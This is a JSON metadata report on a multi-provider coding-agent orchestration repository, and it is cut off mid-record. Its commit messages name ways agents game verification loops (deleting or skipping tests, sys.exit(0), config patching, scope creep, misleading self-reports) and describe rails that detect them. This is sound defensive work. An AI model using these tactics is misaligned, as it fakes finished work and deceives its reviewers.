JSON-Rohbericht maschinenlesbar
{
"data": {
"repo": {
"topics": [
"agentic-workflows",
"ai-agents",
"automation",
"claude",
"cli",
"coding-agent",
"developer-tools",
"github-copilot",
"llm",
"typescript",
"agent-orchestration",
"llm-verification",
"multi-agent",
"multi-provider"
],
"is_fork": false,
"size_kb": 2147,
"has_wiki": true,
"homepage": "https://saimeda32.github.io/looprail/",
"languages": {
"Shell": 6952,
"JavaScript": 3935,
"TypeScript": 1620279
},
"pushed_at": "2026-07-19T01:13:30Z",
"created_at": "2026-07-03T04:26:38Z",
"owner_type": "User",
"updated_at": "2026-07-17T01:48:31Z",
"description": "Multi-provider coding-agent orchestration in a verified loop: a critic on a different model signs off before work ships. Claude Code, Codex, Gemini, aider, Copilot, opencode, local.",
"is_archived": false,
"is_disabled": false,
"license_spdx": "MIT",
"default_branch": "main",
"license_spdx_raw": "MIT",
"primary_language": "TypeScript",
"significant_languages": [
"TypeScript"
]
},
"owner": {
"blog": null,
"name": null,
"type": "User",
"login": "saimeda32",
"company": null,
"location": null,
"followers": 0,
"avatar_url": "https://avatars.githubusercontent.com/u/80650978?v=4",
"created_at": "2021-03-14T21:58:32Z",
"is_verified": null,
"public_repos": 10,
"account_age_days": 1954
},
"license": {
"state": "standard",
"spdx_id": "MIT",
"raw_spdx": "MIT",
"file_present": true,
"scorecard_found": true,
"profile_has_license": true
},
"activity": {
"releases": [
{
"tag": "v0.11.0",
"kind": "minor",
"published_at": "2026-07-17T01:48:30Z"
},
{
"tag": "v0.10.0",
"kind": "minor",
"published_at": "2026-07-17T00:37:10Z"
},
{
"tag": "v0.9.2",
"kind": "patch",
"published_at": "2026-07-15T23:13:42Z"
},
{
"tag": "v0.9.1",
"kind": "patch",
"published_at": "2026-07-15T21:07:45Z"
},
{
"tag": "v0.9.0",
"kind": "minor",
"published_at": "2026-07-08T21:13:59Z"
},
{
"tag": "v0.8.1",
"kind": "patch",
"published_at": "2026-07-08T03:33:18Z"
},
{
"tag": "v0.8.0",
"kind": "minor",
"published_at": "2026-07-08T02:38:58Z"
},
{
"tag": "v0.7.0",
"kind": "minor",
"published_at": "2026-07-07T23:55:05Z"
},
{
"tag": "v0.6.2",
"kind": "patch",
"published_at": "2026-07-07T22:40:27Z"
},
{
"tag": "v0.6.1",
"kind": "patch",
"published_at": "2026-07-07T21:10:00Z"
},
{
"tag": "v0.6.0",
"kind": "minor",
"published_at": "2026-07-07T19:43:40Z"
},
{
"tag": "v0.5.0",
"kind": "minor",
"published_at": "2026-07-06T23:31:15Z"
},
{
"tag": "v0.3.1",
"kind": "patch",
"published_at": "2026-07-06T17:46:46Z"
},
{
"tag": "v0.3.0",
"kind": "minor",
"published_at": "2026-07-05T23:56:22Z"
},
{
"tag": "v0.2.0",
"kind": "minor",
"published_at": "2026-07-05T19:55:57Z"
},
{
"tag": "v0.1.0",
"kind": "minor",
"published_at": "2026-07-05T18:40:52Z"
}
],
"recent_commits": [
{
"oid": "e054b1032c3bff76b0dec07e54a3b550a68b00a5",
"body": "… phone-ready dashboards",
"is_bot": false,
"headline": "chore(release): 0.11.0 - live run rendering, gate cards, completions,…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-17T01:48:25Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "ccace5da3ea22e83090e1857eedb63b055927dbc",
"body": "A real terminal now gets one status block that updates in place - spinner\non running nodes, per-node cost + elapsed, live iteration/cost ticker in\nthe header - instead of an append-only scroll. Pure state+render core\n(applyEvent/renderLive, unit-tested: re-running nodes update their row and\naccumula\n[…]\nblock freezes in\nplace, the boxed gate card and its readline prompt scroll below, and a\nfresh block resumes after the answer. Proven through a live pty: plain run,\nand a gated run answered mid-flight.",
"is_bot": false,
"headline": "feat(cli): live in-place run rendering on a TTY",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-17T01:16:18Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "e08069b94defb52ef5ef6eaa803e9359330a4f5e",
"body": "…llow the ANSI-strip regex in the box test",
"is_bot": false,
"headline": "fix(lint): keep emitted-script dollars out of the template literal; a…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-17T01:05:54Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "ad106318bce8b9b9e836593b058f5d1123e5bd29",
"body": "- `looprail completion zsh|bash|fish` generates completion scripts from the\n live command list (can never drift from what ships); zsh/bash output\n verified with the shells' own parsers\n- the stdin gate now renders a boxed card before asking: the gate id, a\n trimmed preview of the upstream work ac\n[…]\ns are excluded - caught the role-instructions leak live\n through a pty), and the y/n/a/feedback action line. ui.ts gains a box()\n helper measured on color-stripped text so ANSI never skews the frame",
"is_bot": false,
"headline": "feat(cli): shell completions + boxed terminal gate cards",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-17T01:01:09Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "26a60eef1cf38ca0024adb08130101ecd8d00e44",
"body": "…gnosis",
"is_bot": false,
"headline": "chore(release): 0.10.0 - config memory, arrow-key init, dashboard dia…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-17T00:37:07Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "fa7da740fa3c67d3591589f8f7a61936cf0e8973",
"body": "New GET /run/<hash>/<runId>/why serves the same plain-language diagnosis\nthe CLI's why command produces (core/diagnose.ts - moved from cli/ to\ncore/ for clean layering, since the dashboard consumes it now). The run\npage renders it as a panel under the halt reason for HALTED runs only\n(verified needs no help, parked has its own resume affordance), fetched\nonce per terminal state rather than on every model poll. Route unit test +\nan HTTP integration test against a real halted run's journal.",
"is_bot": false,
"headline": "feat(dashboard): halt diagnosis inline on the run page",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-17T00:32:10Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "b77cf70d8e5963f687ac80b21d0d85a8c40a2090",
"body": "The session's recurring intermittent failure, finally pinned: integration\ntests that boot real HTTP servers and drive full runs finish in ~2s alone\nbut hit 7-11s when a full-suite run pegs every core - blowing vitest's 5s\ndefault. Different files tripped it on different passes (ui-cmd,\nmission-control-integration, gate-control, mode-detection), so the fix is\nthe global ceiling (30s test + hook), not per-file whack-a-mole. Verified\nwith five consecutive full-suite runs.",
"is_bot": false,
"headline": "test: raise the suite timeout ceiling to kill the load flake",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-16T23:57:46Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "edf6240903dde49a124495bb5478f8038aa1e939",
"body": "Every init question (template, agent, model tier) is now an arrow-key\nselector on a real terminal: pointer + color highlight, descriptions\ninline, up/down + vim j/k, wrap-around, enter to choose, ctrl-c exits like\na real ^C. Zero new dependencies - a hand-rolled ~120-line module\n(cli/select.ts) with\n[…]\n; decodeKeys() splits a chunk into individual key events, and\n keys after a terminal one are left for the NEXT prompt\n- tiny-pty widths (columns 0) truncated labels to stubs; width now floors\n at 60",
"is_bot": false,
"headline": "feat(init): arrow-key interactive picker - the premium first-run",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-16T23:17:27Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "780e9882767f77de7c221b0ac96539547165571b",
"body": "`looprail config` (list) / `config set <key> <value>` / `config unset <key>`\nover a plain-JSON file, with validation per key and forward-compat (unknown\nkeys from newer versions survive writes). Precedence everywhere: flag > env\n> config file > default.\n\nWired consumers:\n- worker/reviewer: init's pr\n[…]\nan\n unrunnable loop)\n- autoOpen/notify: turn off the gate auto-open or desktop notifications\n without an env var in every shell\n- port: preferred dashboard port for run --ui / ui when no --port flag",
"is_bot": false,
"headline": "feat(config): ~/.looprail/config.json - the tool remembers how you work",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-16T21:57:06Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "51b4e432521c9dfb11d91f82254d6dfaf22bc0d9",
"body": null,
"is_bot": false,
"headline": "chore(release): 0.9.2 - looprail why + gate auto-open dashboard",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T23:13:39Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "236141c3e340aeeb721e59178140e01c6b21c980",
"body": "…ss-test flake",
"is_bot": false,
"headline": "test(notify): restore process.platform after each test to prevent cro…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T23:12:10Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "7077756e7d84304353751207b0edf8c94edcfe04",
"body": "Click-to-open notifications are a dead end on macOS: `display notification`\n(osascript) can only focus Script Editor on click, and `terminal-notifier`\nsilently drops notifications without a permission most machines never\ngranted - a worse regression (no notification at all). So instead of\nrelying on\n[…]\nto its own dashboard, detached/plain to\n mission control (4748)\n- notifier reverted to reliable osascript with the URL in the body (the\n terminal-notifier routing silently failed without permission)",
"is_bot": false,
"headline": "feat(gates): auto-open the dashboard when a gate needs you",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T23:09:25Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "80dee7fa9a2f75e7d6385b133afde754e81337da",
"body": "A desktop notification for a waiting gate used to open Script Editor on\nclick (the macOS `display notification`/osascript default) - useless when\nwhat you need is to go answer the gate. It now carries the run's dashboard\ndeep-link (`<base>/run/<hash>/<runId>/`) as the click target: macOS uses\n`termi\n[…]\nswer surface.\n\nVerified live: terminal-notifier -open fires and the deep-linked run page\nresolves 200. Notifier branch unit-tested (terminal-notifier chosen with a\nURL; VITEST guard still suppresses).",
"is_bot": false,
"headline": "feat(notify): gate notifications open the dashboard on click",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T22:51:09Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "337e65282961655149fbd10d1a6279b0fce0d4af",
"body": "Live testing the halt diagnosis caught a parked run printing the outcome\ntwice - the bespoke \"nothing failed, resume\" line AND a near-identical\nauto-diagnosis. Parked already has good handling, so the inline\nauto-diagnosis now skips parked runs; `looprail why` still explains a\nparked run after the fact. Verified live across all six halt shapes\n(cost/convergence, config, gate-park, protect rail, verified) through the\nbuilt CLI.",
"is_bot": false,
"headline": "fix(run): don't double-render the diagnosis on a parked run",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T22:31:31Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "267693234945c596a5df064fae128519b1d1c16b",
"body": "The single biggest friction using any agent loop: a run stops and leaves\nyou with a terse reason and no next move. Now a halted run prints a\nplain-language diagnosis and concrete next steps automatically, and any\npast run can be diagnosed with `looprail why [runId]`.\n\nDeterministic - reads the journ\n[…]\n do\n- verified -> points at `run --pr`, surfaces named gaps\n\nNew src/cli/diagnose.ts (diagnoseRun/factsFromJournal, fully unit-tested)\n+ why-cmd.ts; run-cmd auto-renders on halt. --json for scripting.",
"is_bot": false,
"headline": "feat(cli): looprail why + automatic halt diagnosis",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T22:09:15Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "809a19c25441f82710cbe9000c1da835516e5f16",
"body": "npm@latest dropped Node 20 support, so `npm install -g npm@latest` on the\nnode-20 publish runner started failing EBADENGINE and silently broke every\nrelease (caught when 0.9.1 didn't reach npm). Bump CI to node 22 and pin\nnpm@11 - a floating `@latest` is exactly the rot that broke it; the pin\nkeeps Trusted Publishing working without chasing the next node drop.",
"is_bot": false,
"headline": "fix(ci): publish workflow - node 22 + pinned npm@11 (unbreak releases)",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T20:59:33Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "30627f852dec8140508f8e9c4c90d53f23889ad3",
"body": null,
"is_bot": false,
"headline": "chore(release): 0.9.1 - adjudicate synthesizer + GuardSet refactor",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T20:48:30Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "cea63744d32b0dd0e645d26743eacae2ba904914",
"body": "runLoop had grown to 703 lines with protect/scope/verify_deps/\nno_weaker_tests interleaved as five inline baseline-and-counter blocks -\nthe accumulated cost of stacking rails one at a time. All of it now lives\nin engine/guards.ts as a GuardSet that owns the baselines, the ratcheting\nstrength floor, \n[…]\nion, counter reset on fix, deps probe injection,\nstrength-floor ratchet). The escalation halt is deliberately still checked\nat the original point in runLoop (after plan-approval) to preserve ordering.",
"is_bot": false,
"headline": "refactor(engine): extract the file-guard rails into GuardSet",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T20:44:22Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "a038999dc861e5b63b7eed4ff9a5b74f96e2fbb2",
"body": "adjudicate: true turns a synthesizer into an arbiter that must\nACCEPT/DISMISS(with reason)/DEFER every issue its input branches raised,\nending with an ## Adjudication section - aggregation becomes auditable, no\nfinding silently dropped. Prompt-layer only (deterministic engine\nuntouched); lint L015 w\n[…]\no effect; research-report\nexample adopts it. Pattern credited to the deliberation project, now\nlisted in COMPARISON as an adjacent second-opinion tool that composes as a\ncritic inside a looprail loop.",
"is_bot": false,
"headline": "feat: adjudicate synthesizer + deliberation in comparison",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T20:15:10Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "5019d7e628bd520f0a591ac57b8b08cce8127da1",
"body": "The position is orchestrating multiple agents across providers in one\nverified loop - cross-model review is the mechanism (a vendor can't be its\nown honest reviewer), verified-done is the outcome, cost never enters the\npitch. Hero one-liner, package.json, repo description, and the site hero\nnow lead with multi-provider orchestration; `looprail spend` reframed as\ncross-provider visibility; SKILL's probe note says \"skip redundant\nreviews\" instead of \"cut cost\".",
"is_bot": false,
"headline": "docs: reposition around multi-provider agent orchestration, not cost",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-15T18:27:49Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "bcd711f5dc611a423b9ee1097b1f657ab56c2e35",
"body": null,
"is_bot": false,
"headline": "fix(lint): attach cause to the pr exec error wrapper",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T22:58:39Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "366fd6493db5c25ada79714413a6813aca4c5733",
"body": "Battle-tested live before cutting: the weakened-suite rail halted a\nskip-silencing shell agent through the installed CLI, and run --pr opened\na real evidence-body PR end to end against a scratch GitHub repo -\nwhich also caught and fixed two real defects first (git/gh stderr was\nswallowed in PR-step errors; an empty fallback summary produced a blank\nPR title GitHub rejects).",
"is_bot": false,
"headline": "chore(release): 0.9.0 - no-weaker-tests rail + run --pr",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T21:13:56Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "0d476ec007e8ecec08732f0f33335a5e2e0a4cc8",
"body": "README: 290 lines (was ~900 of prose) following the pattern the current\ntop trending dev-tool repos converge on - hero/badges/nav + 5-bullet Why +\ninstall and quickstart in the first 20% + one annotated loopfile + the\ncommands table + 12 short feature entries each linking to a real doc +\ncomparison \n[…]\nndency / overnight queue) with\nauto-advance + skip + reduced-motion static fallback, animated loop\ndiagram, rail motif, stats strip. Single file, zero external requests,\n360px-clean, browser-verified.",
"is_bot": false,
"headline": "docs: README restructured to the scannable dev-tool shape + site v2",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T18:03:26Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "e6b64d6bcf0dd64e96462bc8ca6ab1ce72b099ac",
"body": "A VERIFIED run (only) branches looprail/<runId>, commits anything\nuncommitted, pushes, and opens a PR whose body is the run's proof:\nstatus/iterations/cost, the full verdict table, named gaps, and the\ngit-derived files touched - the reviewer reads evidence, not agent\nnarrative. Preflighted (git repo\n[…]\nagent spends, so a\nrun never verifies into a PR it can't open; a PR-step failure after a\nverified run exits 1 with the run's verified status stated. execFile-only\nseam (no shell), fully test-injected.",
"is_bot": false,
"headline": "feat(run): --pr - verified work ships as a pull request of evidence",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T17:41:26Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "42977ccc5d00ee3ed18451ff593b7687578e4be2",
"body": "… leads with cost accounting, not cent amounts",
"is_bot": false,
"headline": "docs: remove internal benchmark lab notes from the public doc; README…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T16:12:23Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "6c391265e3d068f7dd4cae82b23b43b786ddb336",
"body": null,
"is_bot": false,
"headline": "fix(lint): drop unused import in test-strength test",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T04:54:40Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "d9a1c2c06e92ab33d7a36b02c927e76ff46cfccd",
"body": "protect: covers tests-are-the-spec loops; this covers the other shape,\nwhere the agent WRITES the tests and the documented gaming move is\ndeleting the failing assertion or adding .skip to the hard case.\nno_weaker_tests: true measures aggregate suite strength per iteration\n(assertion-pattern counts +\n[…]\nel in the rail. On by default in the build-app template + example.\ne2e: skip-silencing iteration fails -> restored+grown suite verifies at\niteration 2; never-restoring agent halts at iteration 2 of 6.",
"is_bot": false,
"headline": "feat(engine): no-weaker-tests rail - agent-written suites may only grow",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T04:54:05Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "2d43500e7c72bb5eea092acb9bc2a9ec6283aa72",
"body": null,
"is_bot": false,
"headline": "docs: link the fact-checked comparison from the README compare section",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T04:45:04Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "a0677e1d43e1059d4d36662ad9742531b3da6852",
"body": "Every competitor claim verified against the project's live docs before\npublishing; corrections from the fact-check applied: agentops is\nApache-2.0 (not MIT); loki-mode has 8 gates (not 11), 4 active providers,\na REAL tamper guard (proof verify + test-mutation/mock-integrity - now\ncredited) and parti\n[…]\nge queue does run tests\n(framed as merge-time verification); conductor phrased as \"no built-in\nverify-until-pass primitive\" with Claude SDK marked experimental. Dated,\nwith a corrections-welcome line.",
"is_bot": false,
"headline": "docs: fact-checked comparison (docs/COMPARISON.md)",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T04:45:03Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "1260a1ee4e2c6ec1101e0cb53253e0e9d98021ab",
"body": "…tart",
"is_bot": false,
"headline": "docs: GitHub Pages landing - terminal-first pitch, rails grid, quicks…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T04:35:11Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "8d35b32c63ebb57fc26077b4d46c679b6fa778ce",
"body": "Three real-agent passes all verified first-try on both engines; cost\ndifferences are generation-length variance with identical invocation\ncounts. The optimization needs an iterating workload to show a dollar\nnumber - say so rather than dress noise as signal.",
"is_bot": false,
"headline": "docs(bench): record honest efficiency A/B outcome - no publishable delta",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T04:15:41Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "3bf92a6a1c0422d52227405541234d24c574ce97",
"body": "…gv[1]\n\nEvery real install runs the CLI through a symlink (npm -g bin links, npx\ncache .bin links); the is-main guard compared import.meta.url against the\nUNRESOLVED argv[1], so the guard failed, nothing ran, and the process\nexited 0 silently. Only direct `node dist/cli/index.js` (how this repo\ntest\n[…]\no a scratch prefix and invoked via its fully\n realpath'd entry file (macOS /var/folders is itself a symlink - same bug\n class)\n\nchore(release): 0.8.1 with verify_deps + examples refresh riding along",
"is_bot": false,
"headline": "fix(cli)!: installed/npx invocations were silent no-ops - realpath ar…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T03:33:15Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "50f708d2bd6ffcf1734c69a4afd610dd963ed9c7",
"body": null,
"is_bot": false,
"headline": "fix(lint): drop useless escape in requirements.txt name splitter",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:49:29Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "654fba1ca942e75538597e0ff46fb311378b12d9",
"body": "~20% of agent-suggested package names are hallucinations, and attackers\nsquat the recurring fakes (slopsquatting). verify_deps: true probes every\npackage an iteration ADDS to package.json/requirements.txt against its\npublic registry:\n\n- nonexistent -> deterministic iteration fail naming each package\n[…]\no network\non runs that add nothing). Injectable probe seam for tests; live probe\nhits registry.npmjs.org / pypi.org with a 5s timeout. e2e: hallucinated\nadd -> fail naming it -> corrected -> verified.",
"is_bot": false,
"headline": "feat(engine): hallucinated-dependency rail (verify_deps:)",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:48:58Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "9910512899bbe1530001c7209225be52d4cbffb3",
"body": "- fix-tests: the full anti-gaming stack (protect: tests, blind critic\n with GAPS, ledger: true) - the flagship shape\n- refactor: protect: tests (behavior-preserving means tests are the\n contract)\n- judge-panel: probe: true (second judge skipped on already-failed rounds)\n- security-audit: ledger: t\n[…]\namples/implement-spec: PRD -> coverage-reviewed plan -> gate,\n mirroring init --from-spec\n- per-example READMEs + main README gallery paragraph updated; every\n yaml lint-clean via CI's examples test",
"is_bot": false,
"headline": "docs(examples): wire the 0.7/0.8 features through the gallery",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:45:32Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "0f129ae94e1c381922dfd0c7600c66627ba16730",
"body": "protect/scope rails, blind validation, graded verdicts, evidence ledger,\nfresh-context (Ralph) mode, spec intake, antigravity adapter, looprail\nspend. Token counts render in human units everywhere (624k / 1.1M / 2.4B -\nnever \"1085.5k\"). Battle-tested live before cutting: 13-case matrix incl.\na real \n[…]\novider run where the blind critic reviewed the actual diff\n(claude-code fix -> real npm-test gate -> copilot-cli blind review with 2\nnamed gaps -> verified at $0.52, ledger chain verified end to end).",
"is_bot": false,
"headline": "chore(release): 0.8.0 - verification integrity wave",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:38:55Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "b240229e2361aa9c68b2888910bed1b3030987c6",
"body": "…rnals\n\nAggregates every run's node_end events into a per-adapter/model table:\ninvocations, real adapter-reported dollars, pricing-derived estimates\n(separate columns, same discipline as everywhere else), tokens; --days\nwindow and --json. Deliberately journal-based rather than scraping other\nCLIs' m\n[…]\nnteractive sessions into looprail's numbers. Closes the\nreal-spend item: the cost rail already halts on real+estimated combined,\nso what remained was visibility, delivered here with exact attribution.",
"is_bot": false,
"headline": "feat(cli): looprail spend - per-provider cost visibility from the jou…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:29:09Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "728317c430eb778cac8eb22ebb23f841fba626e4",
"body": "init --from-spec <path> scaffolds the new implement-spec template: a\nself-planning loop (generates: graph + plan gate) whose planner reads the\nspec ON DISK, maps every requirement to implementing and verifying nodes,\nand ends the plan with a requirement-coverage list; an independent critic\nre-reads \n[…]\naml gains an optional specPath param (only implement-spec\n consumes it); template invariants updated for the planner-keyed worker\n- generated loopfile verified lint-clean end to end via the built CLI",
"is_bot": false,
"headline": "feat(init): spec intake - init --from-spec with requirement coverage",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:26:14Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "961af58ff207121124d61960755af827f2cfdba4",
"body": "…per node\n\nLong runs rot when a growing previous-attempt transcript rides through\nevery prompt. context: fresh on an executor/synthesizer rebuilds its\nprompt each iteration from the durable anchors only - goal, plan, current\n(lineage-scoped) feedback, and the agent's own .looprail/progress.md notes\n\n[…]\notes yet, never an error)\n- lint L014: context: fresh anywhere but executor/synthesizer is a\n no-effect warn\n- e2e: iteration 2's prompt carries the notes iteration 1 wrote and never\n its transcript",
"is_bot": false,
"headline": "feat(engine): fresh-context iterations (context: fresh) - Ralph mode …",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:21:07Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "488040e06cb0867ea47d8a6b66b43fd3ab3aea15",
"body": "ledger: true records every verdict a run produces into\n.looprail/ledger.jsonl (string value = custom path): node, role,\nagent/adapter/model, evidence, gaps, and a sha256 of the exact output\njudged. Each entry's hash covers the previous entry's hash, so editing or\ndeleting history breaks every hash a\n[…]\ncovered by tests).\nGuard verdicts (protect/scope) land in the chain as role \"guard\". Chain\ncontinues across runs. Best-effort append: a run never fails because its\naudit artifact could not be written.",
"is_bot": false,
"headline": "feat(ledger): hash-chained, repo-committable evidence ledger",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:17:29Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "29b8a6d190286b0afc8a655ce3540bf3dfe2d20b",
"body": "A passing critic can list real minor shortcomings on a GAPS: line\n(\";\"-separated, same markdown-prefix tolerance as the other verdict\nlines). The pass still passes, but the run renders \"verified WITH N named\ngap(s)\" listing each one, and --json carries { gaps: [{node, gap}] } -\nsilence never reads a\n[…]\n a fail read as a\ngraded pass), and \"GAPS: none\"/empty segments produce no gaps. The verdict\nformat block teaches critics the line; RunReport.gaps collects from the\nfinal iteration's passing verdicts.",
"is_bot": false,
"headline": "feat(verdicts): graded pass - GAPS: names shortcomings on a verified run",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:10:05Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "a579d0f603ef84b9fa379007663cbbb71d7ebb1f",
"body": "…t the story\n\nA critic reviewing its target's OUTPUT is reviewing the worker's narrative\nabout its work - exactly what a lying or hallucinating model fabricates.\nblind: true swaps the review target for the actual workspace diff since\nrun start: git diff against the recorded run-start HEAD (so a mid-\n[…]\n13: blind anywhere but a critic-with-of is a no-effect warn\n- e2e: in a real git repo the critic's prompt contains the executor's real\n edit and never its \"I rewrote everything brilliantly\" narrative",
"is_bot": false,
"headline": "feat(engine): blind validation (blind:) - critics review the diff, no…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T02:04:25Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "36660dc31f4b4d490ca644686abfef79c7fb4b1a",
"body": "… creep\n\nscope: is an allowlist of globs the run may touch. Any change OUTSIDE it\nfails the iteration with a deterministic verdict naming the files and a\nrevert instruction (journaled as scope_violation); a second consecutive\nviolation halts. Shares one snapshot walk with protect: via a combined\npre\n[…]\nbe a non-empty string list - malformed is a hard\n error, never a silent allow-everything\n- e2e: creep -> fail+instruction -> revert -> verified (2 iterations);\n never-revert -> halted at iteration 2",
"is_bot": false,
"headline": "feat(engine): scope rail (scope:) - structural answer to silent scope…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T01:55:48Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "338bcfeb1da55acf724a92c12e31dfe019598fe7",
"body": "…acking\n\nThe best-documented way agents game a verified loop is editing tests\ninstead of code (deleted/weakened assertions, conftest/jest-config\npatching, sys.exit(0)); prompt-level \"never modify tests\" rules\ndemonstrably don't hold. protect: makes the rule structural:\n\n- `protect: tests` keyword (b\n[…]\nproof: cheat -> fail+instruction -> revert -> verified (2\n iterations); never-revert -> halted at iteration 2, not the rail\n- design doc: docs/superpowers/specs/2026-07-07-test-tamper-guard-design.md",
"is_bot": false,
"headline": "feat(engine): test-tamper guard (protect:) - structural anti-reward-h…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T01:46:19Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "0b3c9a70a000f8d3772e001f9edd0795d6b8a5f6",
"body": "Gemini CLI stopped serving individual Google AI users on 2026-06-18; agy\nis the replacement. First-class adapter: print-mode (-p) plain-text\noutput, -m model pin, safe->--sandbox / full->--dangerously-skip-\npermissions presets, chars/4 token estimates feeding a pricing-table\nestimatedCostUsd (costUs\n[…]\nt registry, detect list (with retirement note\n on gemini's fixHint), doctor --models (static snapshot), KNOWN_ADAPTERS\n- gemini adapter kept for enterprise installs\n- README adapter table + CHANGELOG",
"is_bot": false,
"headline": "feat(adapters): antigravity (agy) - Google's Gemini CLI successor",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-08T01:31:10Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "92306f5243751dbaf13d6b1955cdbac25007303e",
"body": "Battle-tested before cutting: 17-case live matrix on a demo project\n(offline surface + probe skip live through the CLI + a real cross-provider\nrun: claude-code worker, real npm-test gate, copilot-cli critic, verified\nat $0.55).",
"is_bot": false,
"headline": "chore(release): 0.7.0 - probe panels, skills-CLI install, efficiency A/B",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T23:55:02Z",
"body_truncated": false,
